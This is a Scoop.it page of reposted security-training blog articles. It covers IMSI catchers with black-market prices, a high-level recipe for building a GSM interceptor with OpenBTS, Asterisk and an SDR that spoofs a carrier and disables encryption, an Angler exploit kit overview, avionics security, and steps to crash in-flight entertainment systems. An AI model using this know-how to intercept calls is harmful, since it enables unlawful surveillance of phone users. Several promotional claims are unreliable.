Dispositivos son también conocidos como GSM INTERCEPTOR o IMSI CATCHER. James Taylor experto de curso de seguridad informática de celulares, nos mencionó algunos de ellos como GOSSAMER, LONGSHIP, BLACKFIN, BLACKFIN II, HAWKSBILL, SPURDOG, FISHFINDER, KINGFISH, STINGRAY, STINGRAY II, GSM INTERROGATOR, CDMA INTERROGATOR, IDEN INTERROGATOR, UMTS INTERROGATOR, FISHHAWK, PORPOISE, FIREFISH, TARPON, AMBERJACK, HARPOON, MORAY, LANTERNEYE, RAYFISH, STONECRAB. Hay varios dispositivos como éstos fácilmente disponible en el mercado.

Vamos a hablar de algunos de ellos a continuación:

Dispositivos como Gossamer
Gossamer es un pequeño dispositivo portátil que es similar a Stingray y puede recopilar datos de los teléfonos móviles que están operando en su rango. El dispositivo de Gossamer es mucho más pequeño de Stingray y se puede utilizar para realizar un ataque de denegación de servicio sobre los usuarios de teléfonos, bloqueando sus teléfonos a hacer o recibir llamadas. Según los analistas de la industria de seguridad informática, el costo aproximado de dispositivos como Gossamer en el mercado negro de en México, Brasil y Argentina es de 10,000 a 20,000 dólares, dependiendo del estado del dispositivo y características del dispositivo.

Dispositivos como Triggerfish
Triggerfish es un dispositivo de espiar. Con él podemos interceptar las llamadas, los mensajes en tiempo real en el área seleccionado. Se permite todas las funciones de la Stingray. Algunas versiones rusas avanzadas de Triggerfish pueden interceptar llamadas, SMS de 10,0000 teléfonos móviles en la zona específica de la ciudad.

Dispositivos como Kingfish
Kingfish es un dispositivo que permite a cualquier persona para rastrear y analizar la información de los celulares en un área. El dispositivo es más pequeño de Stingray, pero le puede dar la lista de conexiones entre diferentes teléfonos. Este dispositivo puede ser controlado de forma inalámbrica para monitorear las comunicaciones.

Dispositivos como Harpoon
El Harpoon es un dispositivo amplificador que se utiliza para aumentar la señal de un dispositivo Stingray o Kingfish, para vigilar grande área y más celulares desde muy lejos. El costo de amplificador Ruso como Harpoon en el mercado negro es alrededor de 15,000 dólares.

3G (UMTS) networks GSM interceptor Este dispositivo escanea automáticamente y detecta los parámetros de todas las redes de 3G en su rango. Intercepta comunicaciones y datos de 3G. El dispositivo detecta todos los móviles 3G y recoge todas identidades (IMSI, IMEI y TMSI). Este dispositivo puede bloquear selectivamente comunicaciones 3G de los móviles. Además las versiones avanzadas de este dispositivo puede tomar el control de los celulares por completo para enviar y recibir llamadas y datos 3G falsos.

CÓMO CREAR SU PROPIO INTERCEPTOR GSM -STINGRAY
Usted puede crear su propio Interceptor GSM / Stingray según profesor quien enseña eso durante capacitación de hacking ético de celulares.

QUE NECESITAMOS
BSC (Base StationController) es el cerebro de BTS. Es el dispositivo que toma decisiones y decide cambiar entre diferentes BTS. También se hace transferencia de las llamadas a otros BTS. La interfaz entre BSC y BTS se llama interfaz de GSM A-bis.
En nuestro caso vamos a utilizar el software OpenBTS para configurar nuestra SOFTWARE DEFINED RADIO (SDR) plataforma que es un equipo de radio básico pero puede funcionar como radio o con la ayuda de OpenBTS y Linux podemos convertirlo en un Base Transmitting Stations (BTS). También utilizaremos Asterisk Server, que ayudaría en transferencia de las llamadas y es muy fácil de configurar Asterisk Server como BSC.
• OpenBTS es un software de código abierto.
• Asterisk Server es también una código abierto.
• Linux como todos sabemos, es también de código abierto.
• SOFTWARE DEFINED RADIO (SDR) es una plataforma de hardware que le costará alrededor de 500 a 1.000 dólares.

CÓMO FUNCIONA
BTS verifica la identidad de dispositivo móvil con el cual se conecta pero el dispositivo móvil no verifica la identidad de BTS con el cual se conecta. Debido a que los celulares siempre eligen BTS con señal más fuerte. Así que si hay nueva BTS con señal más fuerte, el teléfono móvil se conectará siempre con esa BTS.
En comunicación GSM, BTS decide habilitar el cifrado o no y por esa razón nuestra estación de OpenBTS no utiliza el cifrado para que podamos escuchar todas las llamadas y mensajes. El receptor IMSI no rompe el cifrado GSM pero sólo actúa como una estación BTS y le dice al celular para desactivar el cifrado GSM. Con el fin de suplantar una red real necesitaremos un poco de información: el código de país de móvil, el código de red móvil y el nombre de la red. Todos estos datos podemos encontrar fácilmente en Internet y podemos programar nuestra OpenBTS con estos valores y configurar TELCEL o cualquier red. Después de configurar estos ajustes en nuestra BTS, los teléfonos móviles dentro del rango se iniciarán conexiones con nuestra OpenBTS.
También vamos a configurar Asterisk Server, que actuará como un software de switching de llamadas y también nos ayudaría en interceptar llamadas en tiempo real, o también grabarlas. Usted puede aprender cómo configurar su propia red móvil durante los cursos de hacking ético de iicybersecurity. A continuación el video de hacker de GSM Chris Paget, va a mostrar cómo la configuración final se verá. Este artículo es sólo con fines educativos solamente.

Fuente: http://www.iicybersecurity.com/interceptar-comunicaciones-celular.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

How the powerful and dangerous angler exploit kit works

David Thomas's insight:

 The Angler Exploit Kit is a very powerful and advanced exploit kits used by hackers. This kit is considered more powerful Blackhole exploit kit by many information security and ethical hacking training experts as it has caused bigger number of infection.

Why angler exploit kit is powerful and dangerous

1. Angler exploit kit uses a different zero-day exploits to exploit browser plugins like Java, Adobe Flash and Microsoft Silverlight.

2. Angler uses the drive-by download technique to drop the malware/payload depending upon the vulnerability in the machine. Also known as fileless infection (memory injection), the exploit runs in RAM. The code is injected into some running process, such as iexplore.exe or javaw.exe, which is then used for the exploit. Because the exploit code doesn't exist as a file, it cannot be detected via intrusion prevention systems and antivirus programs. The payload is usually a program called a dropper whose purpose is to download and install one or more malware programs.

3. The payloads used in the kit include banking Trojans like Zeus or Citadel, ransomware such as Cryptolocker, Bedep marketing malware and keylogging software.

4. Angler also uses new technique known as “Domain Shadowing” which is an evolution in then cybercrime mentions security experts from International Institute of cyber security. Even though, domain shadowing was used before in 2011, in this technique Angler Exploit Kit uses legal hacked domains to create subdomains and distribute malware. Domain shadowing uses compromised registrant credentials and is very difficult to stop. It is also very difficult to track down the cybercriminals behind these attacks because the compromised accounts are selected at random. Thus bad URL or a URL blacklist doesn’t work here to protect against the attack.

5. Angler Kit changes hash and payloads by using level of page redirections before reaching the final exploit page so that the security products cannot detect it. It uses 302 Cushioning, or a 'cushion attack', to redirect victims to malicious sites without the use of techniques, such as hidden iframes or external script tags.

6. Compromised web servers hosting the exploit kit-landing page can be visited only once from an IP and the hackers are actively monitoring the servers. So that reverse engineering is difficult as per malware reverse engineering and ethical hacking course expert from Mexico, Mike Stevens.

7. It can detect virtual machines and security products in victim system and decide not to run the exploit. So that antivirus company can’t do the reverse engineering of the exploit kit.

8. Angler exploit kit uses encryption and web page obfuscation and decryption of payload at victim machine.

How Angler Exploit Kit works

1. Victim accesses a webpage and receives an advertisement pop up. This ad is webpage of compromised web server.

2. This compromised web server web page redirects to an intermediate server. So that IDS/IPS cannot detect the malware.

3. Intermediate server redirects to a hacker web server hosting the angler exploit kit’s landing webpage.

4. Angler exploit kit page checks for the presence of vulnerable browser plug-ins (Java, Flash, and Silverlight) and their version information. Also it checks for virtual machine and security software like malware reverse engineering software.

5. If security software is found then the exploit just gives the java script error.

6. When a vulnerable browser or plug-ins is found with no security software, the exploit kit delivers the proper encrypted payload and which is decrypted in RAM and code in injected into some running process, such as iexplore.exe or javaw.exe, which is then exploited to get a persistent access to the machine mentioned information security training expert, Jim Taylor.

 Source:http://noticiasseguridad.com/importantes/como-funciona-muy-poderoso-y-peligroso-angler-exploit-kit/

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Flight satellite and navigation system security

Blog sobre Hacking ético industria aeronáutica y Hacks de equipos satelitales de navegación y comunicación
David Thomas's insight:

In our last article over satellite navigation and satellite communication equipmentwe discussed over COBHAM AVIATOR 700D Communication Solution and how common and important this system is. In this article we will cover about COBHAM AVIATOR 700D Communication Solution used onboard.We will also understand security of this solution with the help of ethical hacking course expert of International Institute of Cyber Security, Mike Stevens.

Most common satellite navigation and satellite communication equipment COBHAM AVIATOR 700D is available in two versions. First AVIATOR 700 approved to RTCA specification DO-178B level E and DO- 254 level E, second AVIATOR 700D approved to RTCA specification DO-178B level D and DO- 254 level D. What are level D and Level E?

As per information security training expert, Anita Thomas, international certification authorities have defined standardsfor software security of such devices.Some of the standards are Radio Technical Commission for Aeronautics (RTCA)specification DO-178B or the European Organization for Civil Aviation Equipment(EUROCAE) ED-12B. These standards have different levels, mentioned below:

Level A–Catastrophic

Failure may cause multiple accidents, which includes plane crash.

Level B–Hazardous

This can be result in failure to operate plane or partial plane crash, which might cause passenger and crew injuries.

Level C–Major

This might cause reduced safety margin and passenger discomfort.

Level D–Minor

This might cause reduced safety margin and passenger discomfort or flight route change.

Level E–No Effect

This might not cause reduced safety margin but only passenger discomfort.

Devices with levels A, B, or C requires a strict review process and are very secure. Devices with levels D or E are not required to undergo strict review process and are less secure. As per ethical hacking course expert Mike Stevens the main concern here is that the industry is using level D and E devices even after knowing about their security standards. The industry main concern should be interactions between

devices with different security standards.

Information security training experts from Ioactive were able to demonstrate that it is possible to compromise a system certifiedfor level D that interacts with devices certified for level A, potentially putting the level A devices integrity at risk.

The exploit of vulnerabilities of these devices of level E and D can allow a hacker to hack Swift Broadband Unit (SBU) and the Satellite Data Unit (SDU), which provides AeroH+ and Swift64 services.

As per ethical hacking course expert, any systems connected to these devices, could also be hacked. A successful attack could compromise control of the satellite link channel used by the FANS and other system and malfunction of these subsystems could pose a safety threat for the airplane.

Source:http://www.iicybersecurity.com/seguridad-sistema-navegacion-avion.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

In-flight entertainment system reset and crash

Blog about Ethical hacking in Airline Industry and In-flight entertainment system reset and crash in Mexico & US
David Thomas's insight:

In our last article over In-flight entertainment system we talked over In-flight entertainment system hacks and how easy it is to crash these systems. In this article we will cover some other methods to crash an In-flight entertainment system. We will also understand with the help of ethical hacking course investigator Jorge Rios why system crash is seen as a vulnerability of the these systems.

In the last article we covered some ways like boundary value analysis to find vulnerabilities of these systems and how by using boundary value analysis somebody can crash the system. During our discussion with information security trainingexpert, Anita Thomas, we came to the conclusion that the risk of crashing and maybe hacking of In-flight entertainment system hack is high. We will be discussing some more ways to crash and reset these systems.

One of most common scenario according to Ethical hacking course teacher Jorge Rios that people face is when their In-flight entertainment system hangs or crashes. Some steps that anybody can follow to crash the system are by selecting the music channel to play. You can choose any music channel, after doing this you can press the volume option to increase or decrease the volume. This will result in a pop-up window from where you can adjust the volume. After making the volume to level to want don’t exit the volume adjust window. Just press the ‘on/off’ button. This will not turn off your system it will just blank out your display. When you turn on the screen after some time you will see the volume control screen. When you will touch the Back button, nothing will happen and your system will hang or may crash.

To reboot the crash system you have to take help of flight attendant as they have access to reboot buttons of these systems but it can take about 30 minutes to one hour. Any Information security training should teach how to break the system and how to fix the system. Thetraining should be taken by developers, who develop these systems.

As per our ethical hacking courseexpert there is hard reset button near aisle seat or below the aisle seat and you will have to turn this switch on/ off to reset your system to recover from crash.

Information security training expert Anita Thomas says thatif normal people can crash or reset the system what can expert hacker do if the systems are connected. In our next article we will cover research done by other ethical hackers in the industry and discuss more about satellite channel security. Keep following us. 

Source:http://www.iicybersecurity.com/in-flight-entertainment-system-reset.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Hackeo de sistema de entretenimiento en avión

David Thomas's insight:

En nuestro último artículo sobre seguridad de sistema de entretenimiento en vuelos discutimos sobre funcionalidades que un sistema de entretenimiento en vuelo tiene y la tecnología del futuro que se están implementando en estos sistemas. También discutimos con investigador de hacking ético Jorge Ríos sobre la seguridad de estos sistemas.

Como todos sabemos que estos sistemas han ayudado mucho en nuestros viajes en aviones. Sin embargo después de la caída de aviones recientemente de las líneas aéreas de Malasia y Air Asia ha habido preocupaciones sobre la seguridad de estos sistemas. Como nadie pudo entender claramente la razón detrás de estos accidentes, por lo que la gente ha empezado a pensar que podría ser causa de un hackeo que salió mal. Durante nuestra entrevista con el experto en capacitación de seguridad informática Anita Thomas, sugirió que el riesgo de hackeo de próxima generación de sistemas de entretenimiento en vuelo es alto. Debido a que los sistemas de

próxima generación se conectan tan bien que el usuario puede comunicarse en mismos canales que los aviones. Los escenarios más comunes que encontrarán son las pruebas que hacen script kiddies. En estos escenarios ellos hacen pruebas para ver cómo un sistema como este pueda estrellarse. Es como jugar con su calculadora antigua y después de un tiempo se muestra un error de salto. Profesor del hacking ético Jorge Ríos dice que si algún script kiddie pueda causar un estrelló de sistema imagina que lo que un experto podría hacer. Algunos de los escenarios de pruebas analizados por la gente son través de aplicaciones y juegos en estos sistemas; el escenario más común es para probar los juegos con el análisis del valor límite. En análisis del valor límite está probando en los límites entre particiones. Tienes que crear límites válidos y no válidos que el sistema puede aceptar y rechazar como entrada.

En su sistema de entretenimiento a bordo, primero tiene que encontrar cualquier juego que permite a los valores de entrada, etc. En este campo puede intentar con números aleatorios para averiguar los límites. Durante la capacitación de seguridad informática, el primer paso es; cómo romper el sistema y es similar a este escenario. Por ejemplo, pruebe el número 10 en ese campo, pueda aceptarla o no. Si no se acepta que significa que no puede aceptar número de 2 dígitos o más y su límite válido deba ser de 1 dígito. Quizás que tenga que hacer hipótesis de dígitos entre 0 y 9. Usted pueda comenzar con el número 5 y imagina que si tenga suerte y es un valor límite. Significa que el campo de entrada aceptará números hasta 4. Un error de programación clásico es ser apagado por 1 al codificar restricciones. Por ejemplo, el programador puede haber tenido la intención de codificar así: 0 <X< 5 Y lo que en realidad fue programado 0 <X <= 5

Ahora tendrá el software que se comporta como se esperaba con el valor ilegal 5. Después de encontrar este pulsó el botón + que se incrementará el valor a 6! Una vez más, pueda ser un problema de aplicación, la restricción del incremente, probablemente diría algo como "si hay valor = 4 no lo incremente." En este caso, el valor no será 4, pero 5 por lo que se incrementa a 6. Usted puede entonces continuar para incrementar el valor del campo pulsando el botón + hasta llegar a 127. Hay muchas cosas que pueda suceder cuando se agrega 1 a este valor, a saber, que 127 + 1 = -128. De acuerdo con nuestro experto de curso de hacking ético 127 + 1 el sistema de entretenimiento se colgará, o reiniciaría el sistema. Así de esta manera usted puede hacer pruebas de script kiddie y comprobar qué tan estable es el sistema. En nuestro próximo artículo vamos a cubrir más de este tipo de hacks y discutir más sobre seguridad de las comunicaciones por satélite. Mantenga siguiéndonos.

 

Fuente:http://www.iicybersecurity.com/hackeo-sistema-entretenimiento-avion.html

more...
No comment yet.
Rescooped by David Thomas from Cyber Security
Scoop.it!

http://noticiasseguridad.com

SOURCE: http://noticiasseguridad.com TAGS: Test Post, Description http://noticiasseguridad.com

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

In-flight entertainment system Security

In our series of article we will be focusing on airline security, In-flight entertainment security and how can an in-flight entertainment can be hacked & secured. During this research an information security training expert is helping us from international institute of cyber security to understand the system and how it works.

 

What is In-flight entertainment? An In-flight entertainment is system that provides a wonderful passenger experience, helps airlines to earn revenues and helps passengers to spend a quality time during their flight. Each system has state-of-the-art technologies like monitors, handsets and servers, and software’s with great user interface like games and applications. These systems take the passenger experience to a whole new level and allow them to connect to global television; Internet access and email from their airplane seat 10,000 miles above the ground. As per our ethical hacking course expert Jorge Rios, these advantages also lead to number of risks.

 

Most of the In-flight entertainment systems use Ku-band satellite network to deliver content, internetto aircraft. Thus enables the aircraft to be in constant contact with the satellite flying all over the world. This also enables passengers to access the Internet, see live television and even call their family from the plane.

 

Airlines are generating additional revenue with these systems by delivering advertising and in plane shopping, personalized cabin service etc. These systems also manage crew and operations applications which can capture real-time operational and maintenance data. This functionality allows real-time fleet monitoring and ensuring in-flight entertainment and communications (IFEC) solution. It also enables other operational benefits such as electronic flight bag and real-time weather monitoring, ground communication support.

 

As we all know that, satellite communication is secure and encrypted, so these communications should also be secure. As per our information security training professor, Anita Thomas who holds a PhD in cyber security, the satellite communication is secure because lot of hackers don’t have direct access to satellite communication systems. Thus there are very few hackers trying to break the system. You can consider it same as windows and Mac, lot of people have access to windows thus there are lot of security vulnerabilities and in Mac its less.

 

Some of the In-flight entertainment systems also allow passengers to use their mobile phone, smart phone like one supported by AeroMobile. This not only allows passengers to make and receive phone calls, send and read SMS text messages or email, use GPRS services, browse the web, and much more. And everything is connected, your mobile phone with in-flight entertainment system. This sounds

wonderful but is also very scary if you view with the eyes of an ethical hacking course expert Jorge Rios.

There is lot of things that we will be covering in our upcoming articles about cyber security in airline industry and aircrafts in particular. Keep following us.



Source: http://www.iicybersecurity.com/in-flight-entertainment-system-security.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Ethical Hacking Course in Mexico,Information Security Training, Information Security in Mexico, Hacking Course in Mexico, Information Security Course in Mexico

Welcome to iicybersecurity.com! we offer solutions for ethical hacking course in Mexico, Hacking in Mexico, information security in Mexico,Information Security Training,Ethical Hacking Training,Information Security Course
David Thomas's insight:

Currently, the cyber terrorism and cyber attacks on businesses, government, and financial institutions around the world is a reality. From web pages, databases theft of financial information, theft of passwords of emails or social networks, mobile chats, photos, even identity theft are all realities of everyday life. The damage that can cause a "hack" into your network, to monetary level, could amount to millions of dollars, not counting the public embarrassment and lack of confidence that this could bring to their customers. These attacks can come from other countries, groups of cyber criminals, cyber terrorists, having motivations (large) economic or a 15 year old with a lot of knowledge and time on their hands; is also common for attacks originating within the same corporate or institutional network, often by their own employees.

 

The most effective way to counter cyber attacks are regularly doing vulnerability testing by undertaking Ethical Hacking Course in Mexico, where iicybersecurity certified professionals make all kinds of tests and attacks (no damage) to the network, computer equipment, voice over IP telephony and mobile devices and confidentially report customer all vulnerabilities found. This way, you can correct the flaws of existing safety and prevent future attacks and information theft. With the rise of electronic attacks, not only in frequency but also in with, every day it becomes more important to test the effectiveness of your security.

 

Ethical Hacking Course from iicybersecurity will help you:

• Identify both external and internal threats

• Assess and prioritize the risk of each vulnerability identified

• Review criteria and database environments plus networks

• Find non-technical methods to access their IT assets without authorization

Usually the general characteristics of the infrastructure to be analyzed are:

1. desktop computers and laptops.

2 Servers.

3 connectivity between branches.

4 Wireless networks.

5. Firewalls, switches and routers.

6 Telephony Voice Over IP (VoIP).

7 web portal company or institution.

  

Vulnerability testing can be compared to find the open door in a building, and is the first step in any strategy to verify the computer security of a corporate network.

With the help of Ethical Hacking in Mexico our specialists have proven tools recognized in the industry, combined with our own techniques to examine in detail and identify vulnerabilities in their computer systems combined. Unlike other automated services that only provide a computer generated list each vulnerability existing in your network, iicybersecurity services includes the prioritization of vulnerabilities that are most relevant to their infrastructure as well as provide tips to reduce them.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Infrastructure Security in Mexico

Infrastructure Security in Mexico | Webimprints | Scoop.it
Webimprints es la empresa de computación en nube en México D.F. Proporciona servicios de seguridad en la nube en México. Computación en nube reduce los costos de operación y permite a las personas acceder a sus servicios
more...
No comment yet.